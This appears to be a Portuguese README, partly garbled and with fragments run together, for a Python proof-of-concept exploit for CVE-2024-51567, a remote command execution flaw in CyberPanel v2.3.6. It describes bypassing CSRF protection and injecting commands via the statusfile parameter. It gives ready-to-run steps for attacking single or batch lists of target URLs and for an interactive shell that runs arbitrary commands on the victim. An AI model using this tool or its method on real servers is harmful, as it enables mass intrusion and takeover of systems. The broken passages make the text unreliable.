
CVE-2024-51567 é um PoC de exploit em Python que visa uma vulnerabilidade de RCE no endpoint upgrademysqlstatus do CyberPanel v2.3.6, contornando as proteções de CSRF.
upgrademysqlstatus do CyberPanel, ao contornar a proteção do secMiddleware para requisições POST, um atacante pode explorar o parâmetro statusfile para injetar comandos e executá-los remotamente.httpxClonar o projeto e instalar dependências
git clone https://github.com/XiaomingX/cve-2024-51567-poc.git
cd cve-2024-51567-poc
pip install httpx
Execução contra um único alvo
python CVE-2024-51567.py <URL do alvo>
Exemplo:
python CVE-2024-51567.py http://example.com
Execução em lote contra múltiplos alvos
Liste todos os alvos em um arquivo, uma URL por linha, e então execute:
python CVE-2024-51567.py <arquivo de alvos>
Exemplo:
python CVE-2024-51567.py targets.txt
Após executar o script, entra no modo interativo, onde é possível inserir comandos continuamente até sair (digite exit ou quit).
get_CSRF_token.